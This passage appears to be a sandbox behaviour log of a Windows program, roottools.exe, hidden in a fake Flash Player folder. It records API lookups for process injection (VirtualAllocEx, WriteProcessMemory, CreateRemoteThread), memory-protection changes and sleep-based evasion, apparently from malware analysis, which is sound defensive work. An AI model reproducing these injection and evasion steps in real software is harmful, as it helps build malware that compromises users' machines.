Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayAllocDescriptorEx, address_out = 0x761cddf1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCreateEx, address_out = 0x761fd53f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormat, address_out = 0x76202055 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatDateTime, address_out = 0x762020ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatNumber, address_out = 0x76202151 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatPercent, address_out = 0x762021f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatCurrency, address_out = 0x76202288 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarWeekdayName, address_out = 0x76202335 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMonthName, address_out = 0x762023d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x761d5934 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x761d5a98 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCat, address_out = 0x761d59b4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x7622e405 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarEqv, address_out = 0x7622ef07 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x7622f00a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarImp, address_out = 0x7622ef47 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x7622f15e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x7622dbd4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x7622ecfa True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarPow, address_out = 0x7622ea66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x7622d332 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x7622ee2e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarAbs, address_out = 0x7622ca11 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarFix, address_out = 0x7622cc5f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarInt, address_out = 0x7622cde7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x7622c802 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x7622ec66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarRound, address_out = 0x7622d155 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x761cb0dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecAdd, address_out = 0x761e5f3e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecCmp, address_out = 0x761d4fd0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCat, address_out = 0x761d0d2c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyMulI4, address_out = 0x761e59ed True 1
Fn
Module Get Address module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCmp, address_out = 0x761bf8b8 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\ole32.dll, base_address = 0x75ae0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstanceEx, address_out = 0x75b29d4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x75af0782 True 1
Fn
Module Get Filename process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260 True 2
Fn
Module Load module_name = SXS.DLL, base_address = 0x74e30000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\sxs.dll, function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x74e77685 True 1
Fn
Module Get Handle module_name = c:\windows\syswow64\user32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x758d7d2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromWindow, address_out = 0x758e3150 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromRect, address_out = 0x758fe7a0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MonitorFromPoint, address_out = 0x758e5281 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x758e451a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x758e4413 True 1
Fn
Window Create class_name = ThunderRT6Main, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors False 1
Fn
Window Create class_name = VBMsoStdCompMgr, wndproc_parameter = 0 True 1
Fn
Window Set Attribute class_name = VBMsoStdCompMgr, index = 0, new_long = 3612828 False 1
Fn
Window Create class_name = VBFocusRT6, wndproc_parameter = 0 True 1
Fn
Registry Open Key reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors False 1
Fn
System Get Info type = Operating System True 1
Fn
Keyboard Get Info type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 True 1
Fn
Window Create window_name = Langskallet7, wndproc_parameter = 0 True 1
Fn
Module Load module_name = KERNEL32 , base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadProcessMemory, address_out = 0x759ecfcc True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnumResourceTypesA, address_out = 0x75a50efd True 1
Fn
Module Load module_name = shell32, base_address = 0x76a70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = Shell_NotifyIconA, address_out = 0x76cb8af2 True 1
Fn
Module Load module_name = NTDLL, base_address = 0x77cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = ZwSetInformationProcess, address_out = 0x77ccfb18 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x759d10ff True 1
Fn
Module Load module_name = user32, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetDesktopWindow, address_out = 0x758e0a19 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77cde026 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x759d11a9 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x759d1b00 True 1
Fn
Module Load module_name = ntdll, base_address = 0x77cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtYieldExecution, address_out = 0x77ccff2c True 1
Fn
System Sleep duration = 15 milliseconds (0.015 seconds) True 32
Fn
System Sleep duration = 8000 milliseconds (8.000 seconds) True 1
Fn
Module Load module_name = ntdll, base_address = 0x77cb0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\ntdll.dll, function = NtProtectVirtualMemory, address_out = 0x77cd0028 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x759d53c6 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x759d1282 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x759d1410 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x759d3ed3 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x759d196e True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x759d1826 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtectEx, address_out = 0x75a545bf True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLongPathNameA, address_out = 0x75a5437f True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x759ed802 True 1
Fn
Module Load module_name = IPHlpApi, base_address = 0x756b0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x756b9263 True 1
Fn
Module Load module_name = kernel32, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x759ed9b0 True 1
Fn
Module Load module_name = shell32, base_address = 0x76a70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteA, address_out = 0x76cb7078 True 1
Fn
Module Load module_name = User32, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EnumWindows, address_out = 0x758dd1cf True 1
Fn
Module Load module_name = user32, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x758d9a55 True 1
Fn
Module Load module_name = user32, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = EnumThreadWindows, address_out = 0x758e3961 True 1
Fn
Module Unmap process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x759d7a2f True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x759d49d7 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x759d89b3 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77cf1f6e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x759e10b5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x759d34d5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77cde026 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x759d35b7 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x759ed9b0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x759d2d3c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77ce45f5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x759ddd0e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x759d14e9 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x759d5a7e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x759fd4c4 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x759d103d True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x759d170d True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x759d1400 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x759d5a96 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFreeEx, address_out = 0x759ed9c8 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x759fd075 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x759ed5cd True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x759d5151 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x759ece2e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x759d17ec True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x759d469b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveVectoredExceptionHandler, address_out = 0x77d25f41 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x759d1809 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x759d1b00 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x759d1ae5 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x759d1886 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x759d1245 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AddVectoredExceptionHandler, address_out = 0x77d2742b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x759d7a10 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x759d11f8 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x759f830d True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x759d3e8e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x759d195e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstChangeNotificationW, address_out = 0x759ed851 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextChangeNotification, address_out = 0x759f5c1e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessInJob, address_out = 0x759fc7ea True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateRemoteThread, address_out = 0x75a5416b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeW, address_out = 0x75a5414b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x75a541df True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x75a540fb True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x759d5371 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x759d418b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultUILanguage, address_out = 0x759d44ab True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x759f3b92 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x759d1b48 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x759d17d1 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x77ce2c42 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x759d465a True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x759d192e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x759ed4f7 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeNameForVolumeMountPointW, address_out = 0x759e052f True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x759d1986 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x759d4407 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseMutex, address_out = 0x759d111e True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77cd2270 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x759d4950 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x759eecbb True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x75a544cf True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x759d1856 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x759d4173 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x759d1282 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x759d54ee True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x77cd22b0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x759d1b18 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x759d4442 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenEventW, address_out = 0x759d15d6 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x759ed4dc True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x759d11a9 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x759d14c9 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x759d4a2d True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x759ed9e0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x759d59e2 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x759d4435 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x759d1462 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x759ec860 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x759d3ed3 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x759d4259 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x759d34c8 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x759d34b0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x759d1222 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x759d492b True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x759f8baf True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x759f896c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x759d11c0 True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x759f735f True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x759d3f5c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x759d424c True 1
Fn
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
